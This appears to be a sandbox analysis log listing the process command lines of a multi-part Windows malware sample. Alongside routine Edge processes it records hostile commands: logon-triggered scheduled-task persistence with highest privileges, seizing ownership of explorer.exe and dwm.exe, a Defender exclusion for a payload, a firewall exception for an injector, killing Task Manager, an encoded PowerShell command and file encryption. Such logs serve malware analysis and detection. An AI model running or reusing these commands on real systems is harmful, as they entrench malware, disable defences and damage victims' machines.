"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,9935317460879055041,7039101043739041263,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\helper.vbs"

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 /prefetch:8

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\PING.EXE

ping mrbeast.codes -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy Google.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy Rover.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy spinner.gif C:\Users\Admin\Desktop

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K bloatware.cmd

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe

regmess.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe

1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_091a4519-6c19-48cd-b05f-a90fb69c0301\regmess.bat" "

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe

3.exe

C:\Windows\SysWOW64\reg.exe

reg import Setup.reg /reg:32

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\reg.exe

reg import Console.reg /reg:32

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K SilentSetup.cmd

C:\Windows\SysWOW64\reg.exe

reg import Desktop.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import International.reg /reg:32

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe

WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10396,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT

C:\Windows\SysWOW64\reg.exe

reg import Fonts.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Cursors.reg /reg:32

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5736 -ip 5736

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5736 -s 1784

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweaker.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\werfault.exe

werfault.exe /h /shared Global\0378038449fa4d9682e5b8e5c711d22a /t 6204 /p 6200

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe

scary.exe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe

the.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskmgr.exe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll

wimloader.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_582d51cd-8c29-4269-841f-5d7e9d03a993\caller.cmd" "

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hTlYQIUO0h1A.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand 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

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe

ac3.exe

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\shell1.ps1"

C:\Windows\SysWOW64\PING.EXE

ping trustsentry.com -t -n 1 -s 4 -4

C:\Windows\SysWOW64\PING.EXE

ping ya.ru -t -n 1 -s 4 -4

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EZQihT05n9bv.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\PING.EXE

ping tria.ge -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy bloatware C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy beastify.url C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy shell1.ps1 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\explorer.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\explorer.exe /grant Admin:(F)

C:\Windows\SysWOW64\takeown.exe

takeown /R /F C:\Windows\System32\dwm.exe

C:\Windows\SysWOW64\icacls.exe

icacls c:\Windows\System32\dwm.exe /grant Admin:(F)

C:\Windows\SysWOW64\xcopy.exe

xcopy xcer.cer C:\Users\Admin\Desktop

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe

freebobux.exe

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe

SolaraBootstraper.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im ctfmon.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wim.dll

wim.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\freebobux.bat""

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\load.cmd" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HncuP1qJTS5v.bat" "

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe

clwcp c:\temp\bg.bmp

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\cringe.mp4"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_74b2ead3-07c5-459f-a40d-b1a98d31497f\lol.ini

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web2.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,12144610200884549989,8085597660636832337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\xcer.cer

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\x.vbs"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LWt94Dub5LFs.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rZmMfjD5k7eK.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe

f3cb220f1aaa32ca310586e5f62dcab1.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,14909979360840004400,3372282537268262913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,839320844312324912,4757314447254224790,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NnbGeaeUTLT0.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,8549282001034365919,15694470923629302497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

